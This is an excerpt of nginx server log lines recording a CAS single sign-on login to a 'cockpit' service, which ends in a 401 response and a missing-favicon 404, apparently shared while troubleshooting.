Jun 13 13:50:14 custom docker/nginx[1719]: 217.170.185.146 - - [13/Jun/2022:13:50:14 +0200] “GET /cas/themes/ces-theme/dist/css/ces.css;jsessionid=D175A8978B03EED079ACEA8AC00FE7E1 HTTP/2.0” 200 22332 “https://scm.ako-agrar.de/cas/login?service=https%3A%2F%2Fscm.ako-agrar.de%2Fcockpit%2F” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.39” “-”
Jun 13 13:50:14 custom docker/nginx[1719]: 217.170.185.146 - - [13/Jun/2022:13:50:14 +0200] “GET /cas/style/custom.css;jsessionid=D175A8978B03EED079ACEA8AC00FE7E1 HTTP/2.0” 200 399 “https://scm.ako-agrar.de/cas/login?service=https%3A%2F%2Fscm.ako-agrar.de%2Fcockpit%2F” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.39” “-”
Jun 13 13:50:14 custom docker/nginx[1719]: 217.170.185.146 - - [13/Jun/2022:13:50:14 +0200] “GET /cas/js/cas.js;jsessionid=D175A8978B03EED079ACEA8AC00FE7E1 HTTP/2.0” 200 825 “https://scm.ako-agrar.de/cas/login?service=https%3A%2F%2Fscm.ako-agrar.de%2Fcockpit%2F” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.39” “-”
Jun 13 13:50:14 custom docker/nginx[1719]: 217.170.185.146 - - [13/Jun/2022:13:50:14 +0200] “GET /cas/themes/ces-theme/dist/images/logo/logo-white-160px.png;jsessionid=D175A8978B03EED079ACEA8AC00FE7E1 HTTP/2.0” 200 6314 “https://scm.ako-agrar.de/cas/login?service=https%3A%2F%2Fscm.ako-agrar.de%2Fcockpit%2F” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.39” “-”
Jun 13 13:50:14 custom docker/nginx[1719]: 217.170.185.146 - - [13/Jun/2022:13:50:14 +0200] “GET /cas/themes/ces-theme/dist/images/favicon/favicon-16px.png;jsessionid=D175A8978B03EED079ACEA8AC00FE7E1 HTTP/2.0” 200 459 “https://scm.ako-agrar.de/cas/login?service=https%3A%2F%2Fscm.ako-agrar.de%2Fcockpit%2F” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.39” “-”
Jun 13 13:50:24 custom docker/nginx[1719]: 217.170.185.146 - - [13/Jun/2022:13:50:24 +0200] “POST /cas/login;jsessionid=D175A8978B03EED079ACEA8AC00FE7E1?service=https%3A%2F%2Fscm.ako-agrar.de%2Fcockpit%2F HTTP/2.0” 302 0 “https://scm.ako-agrar.de/cas/login?service=https%3A%2F%2Fscm.ako-agrar.de%2Fcockpit%2F” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.39” “-”
Jun 13 13:50:24 custom docker/nginx[1719]: 88.99.191.43 - - [13/Jun/2022:13:50:24 +0200] “GET /cas/p3/serviceValidate?service=https%3A%2F%2Fscm.ako-agrar.de%2Fcockpit%2F&ticket=ST-19-JltEmfCe7nS5AoIQ4geD-cas.ces.local&pgtUrl=https%3A%2F%2Fscm.ako-agrar.de%2Fcockpit%2Fapi%2Fv1%2FpgtCallback HTTP/1.1” 200 301 “-” “-” “-”
Jun 13 13:50:24 custom docker/nginx[1719]: 217.170.185.146 - - [13/Jun/2022:13:50:24 +0200] “GET /cockpit/?ticket=ST-19-JltEmfCe7nS5AoIQ4geD-cas.ces.local HTTP/2.0” 401 12 “https://scm.ako-agrar.de/cas/login?service=https%3A%2F%2Fscm.ako-agrar.de%2Fcockpit%2F” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.39” “-”
Jun 13 13:50:24 custom docker/nginx[1719]: 2022/06/13 13:50:24 [error] 113#0: *2933 open() “/etc/nginx/html/favicon.ico” failed (2: No such file or directory), client: 217.170.185.146, server: scm.ako-agrar.de, request: “GET /favicon.ico HTTP/2.0”, host: “scm.ako-agrar.de”, referrer: “https://scm.ako-agrar.de/cockpit/?ticket=ST-19-JltEmfCe7nS5AoIQ4geD-cas.ces.local”
Jun 13 13:50:24 custom docker/nginx[1719]: 217.170.185.146 - - [13/Jun/2022:13:50:24 +0200] “GET /favicon.ico HTTP/2.0” 404 916 “https://scm.ako-agrar.de/cockpit/?ticket=ST-19-JltEmfCe7nS5AoIQ4geD-cas.ces.local” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.39” “-”